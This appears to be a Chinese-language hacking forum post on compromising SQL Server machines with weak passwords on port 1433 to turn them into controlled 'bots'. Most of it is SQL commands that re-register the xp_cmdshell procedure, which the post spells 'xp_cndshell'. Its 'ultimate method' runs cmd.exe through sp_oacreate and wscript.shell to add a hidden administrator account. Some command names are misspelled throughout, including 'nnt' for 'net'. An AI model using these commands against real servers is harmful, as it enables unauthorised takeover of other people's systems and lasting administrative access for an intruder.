SQL弱口令1433抓鸡遇到问题  
 

扫到SQL弱口令后利用SQLTOOLS出现未能找到存储过程 ’master..xp_cndshell’ 
这种情况的主要原因是删除了扩展存储过过程xp_cndshell，有一个恢复的办法，如果不成功说明被改名了 

使用SQLTOOLS连接，连接后在利用目录下点执行数据库命令，执行： 
EXEC sp_addextendedproc xp_cndshell ,@dllname =’xplog70.dll’ 
运气好的话就成功了，如果你想让你的肉鸡用SQL执行不了DOS命令的话，执行： 
sp_dropextendedproc "xp_cndshell" 
就执行不了DOS命令了，当然用上面的语句可以复原。 

用SQLTOOLS可以连接成功，执行DOS命令，却总是显示这个、、、拒绝了对对象 ’xp_cndshell’（数据库 ’master’，所有者 ’dbo’）的 EXECUTE 权限。 
怎么解决？？？？ 
上传文件也不行。。。 
1 未能找到存储过程’master..xpcndshell’。 

恢复方法：查询分离器连接后， 

第一步执行：EXEC sp_addextendedproc xp_cndshell,@dllname =’xplog70.dll’declare @o int， 
第二步执行：sp_addextendedproc ’xp_cndshell’, ’xpsql70.dll’， 
然后按F5键命令执行完毕。 

2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一DLL。原因126（找不到指定模块。） 

恢复方法：查询分离器连接后， 

第一步执行：sp_dropextendedproc "xp_cndshell"， 
第二步执行：sp_addextendedproc ’xp_cndshell’, ’xpsql70.dll’ 
然后按F5键命令执行完毕。 

3 无法在库 xpweb70.dll 中找到函数 xp_cndshell。原因: 127(找不到指定的程序。) 

恢复方法：查询分离器连接后, 
第一步执行：exec sp_dropextendedproc ’xp_cndshell’ 
第二步执行：exec sp_addextendedproc ’xp_cndshell’,’xpweb70.dll’ 
然后按F5键命令执行完毕。 

四.终极方法： 

如果以上方法均不可恢复，请尝试用下面的办法直接添加帐户： 

查询分离器连接后， 

2000servser系统: 

declare @shell int exec sp_oacreate ’wscript.shell’,@shell output 
exec sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c nnt user 新用户 密码 /add’ 

declare @shell int exec sp_oacreate ’wscript.shell’,@shell output exec sp_oamethod 
@shell,’run’,null,’c:\winnt\system32\cmd.exe /c nnt localgroup administrators 新用户 /add’ 

xp或2003server系统: 

declare @shell int exec sp_oacreate ’wscript.shell’,@shell output exec sp_oamethod 
@shell,’run’,null,’c:\windows\system32\cmd.exe /c nnt user 新用户 密码 /add’ 
declare @shell int exec sp_oacreate ’wscript.shell’,@shell output exec sp_oamethod 
@shell,’run’,null,’c:\windows\system32\cmd.exe /c nnt localgroup administrators 新用户 /add’ 

还不行就没办法了